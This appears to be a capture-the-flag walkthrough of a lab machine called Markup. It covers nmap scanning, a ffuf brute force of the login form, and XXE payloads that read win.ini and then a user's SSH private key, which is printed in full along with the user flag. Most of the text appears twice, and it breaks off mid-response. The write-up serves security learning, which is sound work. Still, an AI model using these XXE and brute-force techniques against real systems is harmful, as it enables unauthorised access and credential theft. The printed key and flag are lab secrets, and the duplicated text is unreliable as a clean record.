05.MARKUP

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -sC -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)
 | ssh-hostkey: 
 |   3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA)
 |   256 90:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA)
 |_  256 f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519)
 80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
 |_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
 |_http-title: MegaShopping
 | http-cookie-flags: 
 |   /: 
 |     PHPSESSID: 
 |_      httponly flag not set
 443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
 |_ssl-date: TLS randomness does not represent time
 | ssl-cert: Subject: commonName=localhost
 | Not valid before: 2009-11-10T23:48:47
 |_Not valid after:  2019-11-08T23:48:47
 |_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
 | tls-alpn: 
 |_  http/1.1
 | http-cookie-flags: 
 |   /: 
 |     PHPSESSID: 
 |_      httponly flag not set
 |_http-title: MegaShopping

 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.
 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
         
 * use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
    - the -PN option treats all hosts as online and will skip host discovery

VULNERABILITY SCANNING

root@htb:~$ sudo nmap --script=vuln {targetIP} -p 22,6789,8080,8443,8843,8880
 PORT   STATE SERVICE
 22/tcp  open  ssh
 80/tcp  open  http
 | http-slowloris-check: 
 |   VULNERABLE:
 |   Slowloris DOS attack
 |     State: LIKELY VULNERABLE
 |     IDs:  CVE:CVE-2007-6750
 |       Slowloris tries to keep many connections to the target web server open and hold
 |       them open as long as possible.  It accomplishes this by opening connections to
 |       the target web server and sending a partial request. By doing so, it starves
 |       the http server's resources causing Denial Of Service.
 |       
 |     Disclosure date: 2009-09-17
 |     References:
 |       http://ha.ckers.org/slowloris/
 |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
 |_http-trace: TRACE is enabled
 | http-enum: 
 |_  /icons/: Potentially interesting folder w/ directory listing
 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
 | http-csrf: 
 | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.140.205
 |   Found the following possible CSRF vulnerabilities: 
 |     
 |     Path: http://10.129.140.205:80/
 |     Form id: 
 |_    Form action: 
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 | http-cookie-flags: 
 |   /: 
 |     PHPSESSID: 
 |_      httponly flag not set
 443/tcp open  https
 |_http-trace: TRACE is enabled
 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
 | http-cookie-flags: 
 |   /: 
 |     PHPSESSID: 
 |       secure flag not set and HTTPS in use
 |_      httponly flag not set
 | http-csrf: 
 | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.140.205
 |   Found the following possible CSRF vulnerabilities: 
 |     
 |     Path: https://10.129.140.205:443/
 |     Form id: 
 |_    Form action: 
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 | ssl-dh-params: 
 |   VULNERABLE:
 |   Diffie-Hellman Key Exchange Insufficient Group Strength
 |     State: VULNERABLE
 |       Transport Layer Security (TLS) services that use Diffie-Hellman groups
 |       of insufficient strength, especially those using one of a few commonly
 |       shared groups, may be susceptible to passive eavesdropping attacks.
 |     Check results:
 |       WEAK DH GROUP 1
 |             Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
 |             Modulus Type: Safe prime
 |             Modulus Source: RFC2409/Oakley Group 2
 |             Modulus Length: 1024
 |             Generator Length: 8
 |             Public Key Length: 1024
 |     References:
 |_      https://weakdh.org
 | http-enum: 
 |_  /icons/: Potentially interesting folder w/ directory listing
 | http-slowloris-check: 
 |   VULNERABLE:
 |   Slowloris DOS attack
 |     State: LIKELY VULNERABLE
 |     IDs:  CVE:CVE-2007-6750
 |       Slowloris tries to keep many connections to the target web server open and hold
 |       them open as long as possible.  It accomplishes this by opening connections to
 |       the target web server and sending a partial request. By doing so, it starves
 |       the http server's resources causing Denial Of Service.
 |       
 |     Disclosure date: 2009-09-17
 |     References:
 |       http://ha.ckers.org/slowloris/
 |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit user flag and root flag.

#walk the application
root@htb:~$ BROWSER > http://10.129.140.205/
 username: admin
 password: pass
 error msg: Wrong Credentials
 
 * login page identified

#conduct code review
root@htb:~$ BROWSER > http://10.129.140.205/ > CTRL+U

 * nothing pertinent

#brute force login page
root@htb:~$ find / -iname usernames 2>/dev/null
 /usr/share/seclists/Usernames
root@htb:~$ ls
 top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .

root@htb:~$ find / -iname passwords 2>/dev/null
 /usr/share/seclists/Passwords
root@htb:~$ ls
 500-worst-passwords.txt
root@htb:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .

#retrieve site parameters
root@htb:~$ burpsuite
BURP > Proxy > BROWSER
 URL: 10.129.140.205
  - Forward requests until the full page is loaded
  
BURP > BROWSER > http://10.129.140.205
 Welcome ...
 Username: admin
 Password: pass
 
BURP > Proxy > BROWSER
 
 Requests
 ...
 PPOST / HTTP/1.1
 Host: 10.129.140.205
 Content-Length: 28
 Cache-Control: max-age=0
 Accept-Language: en-US,en;q=0.9
 Origin: http://10.129.140.205
 Content-Type: application/x-www-form-urlencoded
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Referer: http://10.129.140.205/
 Accept-Encoding: gzip, deflate, br
 Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
 Connection: keep-alive

 username=admin&password=pass
 
 right-click on the "request" section > copy to file
  Filename: requests.txt
  File Type: All Files
  
root@htb:~$ nano requests.txt
 ...
 username=unameFUZZ&password=passFUZZ
 j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in

 * add the {FUZZ} markers to the username/password section
 
root@htb:~$ fuf -request requests.txt -request-proto http -mode clusterbomb -w top-usernames-shortlist.txt:unameFUZZ -w 500-worst-passwords.txt:passFUZZ -c -fr "Wrong Credentials" -r 
 [Status: 200, Size: 3149, Words: 1177, Lines: 97, Duration: 15ms]
    * passFUZZ: password
    * unameFUZZ: admin

 :: Progress: [8483/8483] :: Job [1/1] :: 263 req/sec :: Duration: [0:00:29] :: Errors: 0 ::

 * ensure the value username and password value matches in both ffuf and reqests.txt
 * ffuf's default mode is pitchfork matching
    - this is where the wordlist is matched line by line
    - ffuf can simulate Burp Suite's clusterbomb style through the use of 
      recursion with multiple -w flags or with -request-proto or custom-made 
      requests using -request.
       - clusterbomb combines all permutations of multiple payload positions
         similar to a nested loop of each payload set.

 * the -c flag outputs the result in color
 * the -r flag follows HTTP redirects during fuzzing
 * the -fs flag filters results based on content size
 * the -fr flag filters results based on a regex pattern.

#identify potential vulnerable entry points
root@htb:~$ BROWSER > http://10.129.140.205/
 username: admin
 password: password
 
 * identified orders and contact pages
    - the input fields in these pages may be vulnerable
    
#code review
root@htb:~$ BROWSER > {targetSite:port} > Order > CTRL + U
 <!DOCTYPE html>
  <html lang="en">
   <head>
    <meta charset="UTF-8">
     <title>Goods & Services</title>
     <!-- Modified by Daniel : UI-Fix-9092-->
     ...
     
 * identified a potential username...daniel

#understand input functions with burp proxy
#analyze intercepted data to see what potential vulns exists
BURP > BROWSER > http://10.129.140.205 > Order
 Type of Goods: default
 Quantity: 1
 Address: test
 
 * http://10.129.140.205/services.php
 
 ...
 Request
 
 POST /process.php HTTP/1.1
 Host: 10.129.140.205
 Content-Length: 111
 Accept-Language: en-US,en;q=0.9
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
 Content-Type: text/xml
 Accept: */*
 Origin: http://10.129.140.205
 Referer: http://10.129.140.205/services.php
 Accept-Encoding: gzip, deflate, br
 Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
 Connection: keep-alive

 <?xml version = "1.0"?>
  <order>
   <quantity>1</quantity>
   <item>Home Appliances</item>
   <address>test</address>
  </order>

#search for xml exploit
root@htb:~$ BROWSER > https://www.google.com/
 search: xml expoitation hacktricks
  https://book.hacktricks.wiki/en/pentesting-web/xxe-xee-xml-external-entity.html

#test an xml expoit's validity
BURP > Request > Repeater
 
 Request
 ...
 POST /process.php HTTP/1.1
 Host: 10.129.140.205
 Content-Length: 111
 Accept-Language: en-US,en;q=0.9
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
 Content-Type: text/xml
 Accept: */*
 Origin: http://10.129.140.205
 Referer: http://10.129.140.205/services.php
 Accept-Encoding: gzip, deflate, br
 Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
 Connection: keep-alive

 <?xml version = "1.0"?>
 <!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
  <order>
   <quantity>1</quantity>
   <item>&test;</item>
   <address>test</address>
  </order>

 Response
 ...
 HTTP/1.1 200 OK
 Date: Sat, 10 May 2025 20:58:28 GMT
 Server: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
 X-Powered-By: PHP/7.2.28
 Expires: Thu, 19 Nov 1981 08:52:00 GMT
 Cache-Control: no-store, no-cache, must-revalidate
 Pragma: no-cache
 Content-Length: 144
 Keep-Alive: timeout=5, max=100
 Connection: Keep-Alive
 Content-Type: text/html; charset=UTF-8

 Your order for ; for 16-bit app support
 [fonts]
 [extensions]
 [mci extensions]
 [files]
 [Mail]
 MAPI=1
 [Ports]
 COM1:=9600,n,8,1
 has been processed

 * xml entity vulnerability validated

#LFI
BURP > Request > Repeater
 
 Request
 ...
 POST /process.php HTTP/1.1
 Host: 10.129.140.205
 Content-Length: 111
 Accept-Language: en-US,en;q=0.9
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
 Content-Type: text/xml
 Accept: */*
 Origin: http://10.129.140.205
 Referer: http://10.129.140.205/services.php
 Accept-Encoding: gzip, deflate, br
 Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
 Connection: keep-alive

 <?xml version = "1.0"?>
 <!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/users/daniel/.ssh/id_rsa'>]>
  <order>
   <quantity>1</quantity>
   <item>&test;</item>
   <address>test</address>
  </order>

 Response
 ...
 Your order for -----BEGIN OPENSSH PRIVATE KEY-----
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
-----END OPENSSH PRIVATE KEY-----
 has been processed

#
root@htb:~$ mkdir -p targets/daniel.10.129.24.24
root@htb:~$ touch targets/daniel.10.129.24.24/daniel_id_rsa
root@htb:~$ nano targets/daniel.10.129.24.24/daniel_id_rsa
 -----BEGIN OPENSSH PRIVATE KEY-----
 b3BlbnNz...
 -----END OPENSSH PRIVATE KEY-----
 
root@htb:~$ chmod 400 daniel_id_rsa

#verify private key validity
root@htb:~$ ssh-keygen -l -f daniel_id_rsa 
 3072 SHA256:OrvhzyMF1OAj02guQWL1vg2TSovi5XIQONohNGrkRzQ daniel@Entity (RSA)

root@htb:~$ ssh -i daniel_id_rsa daniel@10.129.24.24
 ...

#
daniel@MARKUP C:\Users\daniel> dir Desktop 
 Volume in drive C has no label.
 Volume Serial Number is BA76-B4E3

 Directory of C:\Users\daniel\Desktop
 
 03/05/2020  07:18 AM                35 user.txt 
 
 
daniel@MARKUP C:\Users\daniel> type Desktop\user.txt
 032d2fc8952a8c24e39c8f0ee9918ef7

#privesc
#check current privileges
daniel@MARKUP C:\Users\daniel> whoami /priv
 Privilege Name                Description                    State
 ============================= ============================== =======
 SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
 SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

 * nothing pertinent
 
daniel@MARKUP C:\Users\daniel> dir c:\ 
 Volume in drive C has no label.   
 Volume Serial Number is BA76-B4E3 

 Directory of c:\

 03/12/2020  03:56 AM    <DIR>          Log-Management
 07/28/2021  03:38 AM                 0 Recovery.txt

 * these are the only two UNCOMMON files
    - always analyze UNCOMMON files prior to going into a rabbit hole
    
daniel@MARKUP C:\Users\daniel> type c:\Recovery.txt 
 blank file

daniel@MARKUP C:\Users\daniel> dir c:\Log-Management
 Volume in drive C has no label. 
 Volume Serial Number is BA76-B4E3

 Directory of c:\Log-Management

 03/06/2020  02:42 AM               346 job.bat

daniel@MARKUP C:\Users\daniel> type c:\Log-Management\job.bat 
 @echo off 
 FOR /F "tokens=1,2*" %%V IN ('bcdedit') DO SET adminTest=%%V
 IF (%adminTest%)==(Access) goto noAdmin
 for /F "tokens=*" %%G in ('wevtutil.exe el') DO (call :do_clear "%%G")
 echo.
 echo Event Logs have been cleared!
 goto theEnd
 :do_clear
 wevtutil.exe cl %1
 goto :eof
 :noAdmin
 echo You must run this script as an Administrator!
 :theEnd
 exit

 * understand the purpose of the batch file and what can be manipulated

Previous04.INCLUDED NextTHM

Last updated 3 hours ago

ENUMERATE SERVICES

root@htb:~$ sudo nmap -sV -sC -T4 {targetIP} -p-
 PORT     STATE SERVICE       VERSION
 22/tcp  open  ssh      OpenSSH for_Windows_8.1 (protocol 2.0)
 | ssh-hostkey: 
 |   3072 9f:a0:f7:8c:c6:e2:a4:bd:71:87:68:82:3e:5d:b7:9f (RSA)
 |   256 90:7d:96:a9:6e:9e:4d:40:94:e7:bb:55:eb:b3:0b:97 (ECDSA)
 |_  256 f9:10:eb:76:d4:6d:4f:3e:17:f3:93:d6:0b:8c:4b:81 (ED25519)
 80/tcp  open  http     Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
 |_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
 |_http-title: MegaShopping
 | http-cookie-flags: 
 |   /: 
 |     PHPSESSID: 
 |_      httponly flag not set
 443/tcp open  ssl/http Apache httpd 2.4.41 ((Win64) OpenSSL/1.1.1c PHP/7.2.28)
 |_ssl-date: TLS randomness does not represent time
 | ssl-cert: Subject: commonName=localhost
 | Not valid before: 2009-11-10T23:48:47
 |_Not valid after:  2019-11-08T23:48:47
 |_http-server-header: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.2.28
 | tls-alpn: 
 |_  http/1.1
 | http-cookie-flags: 
 |   /: 
 |     PHPSESSID: 
 |_      httponly flag not set
 |_http-title: MegaShopping

 * Typically '-sV' is used with Nmap to determine versions, but that's not always enough. 
    - adding the -sC is another good way to determine service versions
       - the -sC option will run safe scripts which are designed to provide useful 
         information without being too intrusive or causing harm to the target systems.
 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
         
 * use the -Pn option of Nmap when ICMP packets are blocked by the Windows firewall
    - the -PN option treats all hosts as online and will skip host discovery

VULNERABILITY SCANNING

root@htb:~$ sudo nmap --script=vuln {targetIP} -p 22,6789,8080,8443,8843,8880
 PORT   STATE SERVICE
 22/tcp  open  ssh
 80/tcp  open  http
 | http-slowloris-check: 
 |   VULNERABLE:
 |   Slowloris DOS attack
 |     State: LIKELY VULNERABLE
 |     IDs:  CVE:CVE-2007-6750
 |       Slowloris tries to keep many connections to the target web server open and hold
 |       them open as long as possible.  It accomplishes this by opening connections to
 |       the target web server and sending a partial request. By doing so, it starves
 |       the http server's resources causing Denial Of Service.
 |       
 |     Disclosure date: 2009-09-17
 |     References:
 |       http://ha.ckers.org/slowloris/
 |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
 |_http-trace: TRACE is enabled
 | http-enum: 
 |_  /icons/: Potentially interesting folder w/ directory listing
 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
 | http-csrf: 
 | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.140.205
 |   Found the following possible CSRF vulnerabilities: 
 |     
 |     Path: http://10.129.140.205:80/
 |     Form id: 
 |_    Form action: 
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 | http-cookie-flags: 
 |   /: 
 |     PHPSESSID: 
 |_      httponly flag not set
 443/tcp open  https
 |_http-trace: TRACE is enabled
 |_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
 | http-cookie-flags: 
 |   /: 
 |     PHPSESSID: 
 |       secure flag not set and HTTPS in use
 |_      httponly flag not set
 | http-csrf: 
 | Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.129.140.205
 |   Found the following possible CSRF vulnerabilities: 
 |     
 |     Path: https://10.129.140.205:443/
 |     Form id: 
 |_    Form action: 
 |_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
 |_http-dombased-xss: Couldn't find any DOM based XSS.
 | ssl-dh-params: 
 |   VULNERABLE:
 |   Diffie-Hellman Key Exchange Insufficient Group Strength
 |     State: VULNERABLE
 |       Transport Layer Security (TLS) services that use Diffie-Hellman groups
 |       of insufficient strength, especially those using one of a few commonly
 |       shared groups, may be susceptible to passive eavesdropping attacks.
 |     Check results:
 |       WEAK DH GROUP 1
 |             Cipher Suite: TLS_DHE_RSA_WITH_AES_256_CBC_SHA
 |             Modulus Type: Safe prime
 |             Modulus Source: RFC2409/Oakley Group 2
 |             Modulus Length: 1024
 |             Generator Length: 8
 |             Public Key Length: 1024
 |     References:
 |_      https://weakdh.org
 | http-enum: 
 |_  /icons/: Potentially interesting folder w/ directory listing
 | http-slowloris-check: 
 |   VULNERABLE:
 |   Slowloris DOS attack
 |     State: LIKELY VULNERABLE
 |     IDs:  CVE:CVE-2007-6750
 |       Slowloris tries to keep many connections to the target web server open and hold
 |       them open as long as possible.  It accomplishes this by opening connections to
 |       the target web server and sending a partial request. By doing so, it starves
 |       the http server's resources causing Denial Of Service.
 |       
 |     Disclosure date: 2009-09-17
 |     References:
 |       http://ha.ckers.org/slowloris/
 |_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD

Submit user flag and root flag.

#walk the application
root@htb:~$ BROWSER > http://10.129.140.205/
 username: admin
 password: pass
 error msg: Wrong Credentials
 
 * login page identified

#conduct code review
root@htb:~$ BROWSER > http://10.129.140.205/ > CTRL+U

 * nothing pertinent

#brute force login page
root@htb:~$ find / -iname usernames 2>/dev/null
 /usr/share/seclists/Usernames
root@htb:~$ ls
 top-usernames-shortlist.txt
root@htb:~$ cp /usr/share/seclists/Usernames/top-usernames-shortlist.txt .

root@htb:~$ find / -iname passwords 2>/dev/null
 /usr/share/seclists/Passwords
root@htb:~$ ls
 500-worst-passwords.txt
root@htb:~$ cp /usr/share/seclists/Passwords/500-worst-passwords.txt .

#retrieve site parameters
root@htb:~$ burpsuite
BURP > Proxy > BROWSER
 URL: 10.129.140.205
  - Forward requests until the full page is loaded
  
BURP > BROWSER > http://10.129.140.205
 Welcome ...
 Username: admin
 Password: pass
 
BURP > Proxy > BROWSER
 
 Requests
 ...
 PPOST / HTTP/1.1
 Host: 10.129.140.205
 Content-Length: 28
 Cache-Control: max-age=0
 Accept-Language: en-US,en;q=0.9
 Origin: http://10.129.140.205
 Content-Type: application/x-www-form-urlencoded
 Upgrade-Insecure-Requests: 1
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
 Referer: http://10.129.140.205/
 Accept-Encoding: gzip, deflate, br
 Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
 Connection: keep-alive

 username=admin&password=pass
 
 right-click on the "request" section > copy to file
  Filename: requests.txt
  File Type: All Files
  
root@htb:~$ nano requests.txt
 ...
 username=unameFUZZ&password=passFUZZ
 j_username=unameFUZZ&j_password=pwFUZZ&from=%2F&Submit=Sign+in

 * add the {FUZZ} markers to the username/password section
 
root@htb:~$ fuf -request requests.txt -request-proto http -mode clusterbomb -w top-usernames-shortlist.txt:unameFUZZ -w 500-worst-passwords.txt:passFUZZ -c -fr "Wrong Credentials" -r 
 [Status: 200, Size: 3149, Words: 1177, Lines: 97, Duration: 15ms]
    * passFUZZ: password
    * unameFUZZ: admin

 :: Progress: [8483/8483] :: Job [1/1] :: 263 req/sec :: Duration: [0:00:29] :: Errors: 0 ::

 * ensure the value username and password value matches in both ffuf and reqests.txt
 * ffuf's default mode is pitchfork matching
    - this is where the wordlist is matched line by line
    - ffuf can simulate Burp Suite's clusterbomb style through the use of 
      recursion with multiple -w flags or with -request-proto or custom-made 
      requests using -request.
       - clusterbomb combines all permutations of multiple payload positions
         similar to a nested loop of each payload set.

 * the -c flag outputs the result in color
 * the -r flag follows HTTP redirects during fuzzing
 * the -fs flag filters results based on content size
 * the -fr flag filters results based on a regex pattern.

#identify potential vulnerable entry points
root@htb:~$ BROWSER > http://10.129.140.205/
 username: admin
 password: password
 
 * identified orders and contact pages
    - the input fields in these pages may be vulnerable
    
#code review
root@htb:~$ BROWSER > {targetSite:port} > Order > CTRL + U
 <!DOCTYPE html>
  <html lang="en">
   <head>
    <meta charset="UTF-8">
     <title>Goods & Services</title>
     <!-- Modified by Daniel : UI-Fix-9092-->
     ...
     
 * identified a potential username...daniel

#understand input functions with burp proxy
#analyze intercepted data to see what potential vulns exists
BURP > BROWSER > http://10.129.140.205 > Order
 Type of Goods: default
 Quantity: 1
 Address: test
 
 * http://10.129.140.205/services.php
 
 ...
 Request
 
 POST /process.php HTTP/1.1
 Host: 10.129.140.205
 Content-Length: 111
 Accept-Language: en-US,en;q=0.9
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
 Content-Type: text/xml
 Accept: */*
 Origin: http://10.129.140.205
 Referer: http://10.129.140.205/services.php
 Accept-Encoding: gzip, deflate, br
 Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
 Connection: keep-alive

 <?xml version = "1.0"?>
  <order>
   <quantity>1</quantity>
   <item>Home Appliances</item>
   <address>test</address>
  </order>

#search for xml exploit
root@htb:~$ BROWSER > https://www.google.com/
 search: xml expoitation hacktricks
  https://book.hacktricks.wiki/en/pentesting-web/xxe-xee-xml-external-entity.html

#test an xml expoit's validity
BURP > Request > Repeater
 
 Request
 ...
 POST /process.php HTTP/1.1
 Host: 10.129.140.205
 Content-Length: 111
 Accept-Language: en-US,en;q=0.9
 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.6723.70 Safari/537.36
 Content-Type: text/xml
 Accept: */*
 Origin: http://10.129.140.205
 Referer: http://10.129.140.205/services.php
 Accept-Encoding: gzip, deflate, br
 Cookie: PHPSESSID=r6m4ghtpl8mo8atrkkig8na2kk
 Connection: keep-alive

 <?xml version = "1.0"?>
 <!DOCTYPE root [<!ENTITY test SYSTEM 'file:///c:/windows/win.ini'>]>
  <order>
   <quantity>1</quantity>
   <item>&test;</item>
   <address>test</address>
  </order>

 Response
 ...
 HTTP/1.1 200 OK
 Date: Sat, 10 May 2025 20:58:28 GMT
